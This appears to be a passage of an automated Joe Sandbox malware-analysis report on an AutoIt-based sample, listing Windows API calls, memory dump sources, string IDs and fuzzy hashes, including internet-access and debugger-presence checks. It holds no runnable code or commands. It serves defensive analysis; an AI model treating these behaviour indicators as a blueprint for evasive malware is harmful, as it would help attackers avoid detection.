                                                                                                                                                                                                                                                                                              • Part of subcall function 00927873: GetStockObject.GDI32(00000011), ref: 009278C5
                                                                                                                                                                                                                                                                                              • Part of subcall function 00927873: SendMessageW.USER32(00000000,00000030,00000000), ref: 009278CF
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 009B4216
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 009B4230
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                            • String ID: static
                                                                                                                                                                                                                                                                                            • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                            • Opcode ID: 19e70b4eb639c0abb4190d5e17ac07d39772732daf669c88131cadb167a9d7da
                                                                                                                                                                                                                                                                                            • Instruction ID: 72154119dbb74c8cd045372f39340db40c82ac6955000425a149b2280a948c30
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19e70b4eb639c0abb4190d5e17ac07d39772732daf669c88131cadb167a9d7da
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2112672610209AFDB00DFA8CD45AFA7BA8EF08324F014928F965E3251E674E851EB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0099D7C2
                                                                                                                                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0099D7EB
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                                            • String ID: <local>
                                                                                                                                                                                                                                                                                            • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                                            • Opcode ID: 838c15835548148ee5666b135b9b565f926188271e3b1ebd96cfd2f2f59cde21
                                                                                                                                                                                                                                                                                            • Instruction ID: 9a370e7c7f8e3293b77fb9519bbac32ad647deb7d3f8f13a93b365020c2bbeb7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 838c15835548148ee5666b135b9b565f926188271e3b1ebd96cfd2f2f59cde21
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E11E9B11172327ADB344BEA8CC9EF7BE5DEB127A4F10422AF50993180D6689940D6F0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333
                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?,?), ref: 0098761D
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00987629
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                            • String ID: STOP
                                                                                                                                                                                                                                                                                            • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                                            • Opcode ID: 34fb7e55b42e7d0ad88e7a22dcb5b6a22d6659feca76486c08e13398ada39997
                                                                                                                                                                                                                                                                                            • Instruction ID: 1f417a5238799759f04413bd30ccd4f47bf0b3988113e584d18daa3bd2860ba8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 34fb7e55b42e7d0ad88e7a22dcb5b6a22d6659feca76486c08e13398ada39997
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA01C432A149269BCB20BEFDDC44ABFB3B9AB607907600A24E42592395FB35DD40D751
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 009845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00984620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00982699
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                            • Opcode ID: c5f163e56a24d56b7b0e03d6178d60dcb995a57323397cdfc804f0f9f45e6577
                                                                                                                                                                                                                                                                                            • Instruction ID: 180874ba6d3cb900bcf806dc217fefede9bcda8a1a7ec8f66ad2742cea7533f8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5f163e56a24d56b7b0e03d6178d60dcb995a57323397cdfc804f0f9f45e6577
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7301D475645225ABCB04FBA4CC51DFE77A8EFD6360B040A1AB833973C5EA315808C750
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 009845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00984620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00982593
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                            • Opcode ID: ecf6f71c67a68baa5f69e341b4019ddbb57cf2ed82583ca0dd9bee5d5b729c56
                                                                                                                                                                                                                                                                                            • Instruction ID: 24579a33861e75cd520aa74126917b3137de34e43766c3e3bc68a7287d42aba0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecf6f71c67a68baa5f69e341b4019ddbb57cf2ed82583ca0dd9bee5d5b729c56
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C01A2B6A81115ABCB05F7A0D962EFF77E8DF95380F540029B903A73C5DA109E0897B1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 009845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00984620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00982615
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                            • Opcode ID: 9c2e3ef297404be72085657de5bd323ddbfb48c55bfdf930245d46fcfdb9cbf0
                                                                                                                                                                                                                                                                                            • Instruction ID: 6930756376b871fc8e5b1f2460e475e92516d3f11928a6e9d9750be99b95a19f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c2e3ef297404be72085657de5bd323ddbfb48c55bfdf930245d46fcfdb9cbf0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8701ADB6A45115ABCB05F7A0D942FFE77A8DF95380F54002AB802A3385EA619E0897B1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333
                                                                                                                                                                                                                                                                                              • Part of subcall function 009845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00984620
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00982720
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                            • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                            • Opcode ID: 564957a67aa498a8bcf15dff0388bf28ab7c9a9e3016e2877041862fc039b611
                                                                                                                                                                                                                                                                                            • Instruction ID: 60f52aa3d04684138c964658749b3671a13c0e29b7659d6336de5baea6243665
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 564957a67aa498a8bcf15dff0388bf28ab7c9a9e3016e2877041862fc039b611
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61F028B5A41224A7CB05F3A49C41FFE73ACEF81390F440919B422A33C5DB606C0CC360
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0098146F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                            • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                            • Opcode ID: bcdb562da8d3af28e7802a885e5afbba59d0147b2988a7e78f0c50e432f0f856
                                                                                                                                                                                                                                                                                            • Instruction ID: 90398c315cc5215c3f061c3213c64b7cf37572b6d6c1a8ff5fb91167da6fcfb2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bcdb562da8d3af28e7802a885e5afbba59d0147b2988a7e78f0c50e432f0f856
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1E0D83224D31437D2243794BC03FC976888F89B65F11442AF788A54C39EF224504399
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0093FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009410E2,?,?,?,0092100A), ref: 0093FAD9
                                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0092100A), ref: 009410E6
                                                                                                                                                                                                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0092100A), ref: 009410F5
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009410F0
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                            • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                            • Opcode ID: cc12650a3bcef5fe404ea52a8aed296e9bfedae4650dfbd997ac4cd7657eb344
                                                                                                                                                                                                                                                                                            • Instruction ID: 08fdda1b564bc12e2b22766baf5d88039c409488fd832d61612839c7f0af5472
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc12650a3bcef5fe404ea52a8aed296e9bfedae4650dfbd997ac4cd7657eb344
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0E09270A083508BD3309F24E904B02BFE4AF44708F008D2CE895C3651EBB4D484CF91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 009939F0
                                                                                                                                                                                                                                                                                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00993A05
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                            • String ID: aut
                                                                                                                                                                                                                                                                                            • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                            • Opcode ID: ca7a257fc2aaf124863bea9feea7fcef3e488fd47ee5ddeec1d87063e70287a3
                                                                                                                                                                                                                                                                                            • Instruction ID: 1748f522e4d2ae125acd295944431037ee7323c1832b082425b9258a0acec1e7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca7a257fc2aaf124863bea9feea7fcef3e488fd47ee5ddeec1d87063e70287a3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AED05E7250536867DA20A7A59D0EFCB7A6CDB44720F0002A5BB6592095EAB0DA85CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009B2DC8
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009B2DDB
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098F292: Sleep.KERNEL32 ref: 0098F30A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                            • Opcode ID: d0968bfc31bd41c693637c1f805281795e22e5be2ee7525d7e2bf213ae424393
                                                                                                                                                                                                                                                                                            • Instruction ID: 5d12990c0cd2989a5e95a3f5adb3ba09d60bb2e76f0bdf453c6d8926ab657c29
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0968bfc31bd41c693637c1f805281795e22e5be2ee7525d7e2bf213ae424393
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57D022353AA300B7E338B370ED0FFD2BB109F80B20F1008207309AA1C0D8E06801C760
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009B2E08
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000), ref: 009B2E0F
                                                                                                                                                                                                                                                                                              • Part of subcall function 0098F292: Sleep.KERNEL32 ref: 0098F30A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                            • Opcode ID: 009b7df38e39111794a042739dbe908f3ccd8e2fbe3fe37c21926781393b4735
                                                                                                                                                                                                                                                                                            • Instruction ID: f55bbf4c40ed8114d0b7afcdf066a074576b5bb6d67335e5d429f886c2a03194
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 009b7df38e39111794a042739dbe908f3ccd8e2fbe3fe37c21926781393b4735
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1D0A93139A300BBE228B370AD0FFC2AB109B84B20F1008207205AA1C0D8E06801C664
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0095C213
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0095C221
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0095C27C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b35219309177e5309c2b630d24054760e8a9829671eed64e8c85ac434967c166
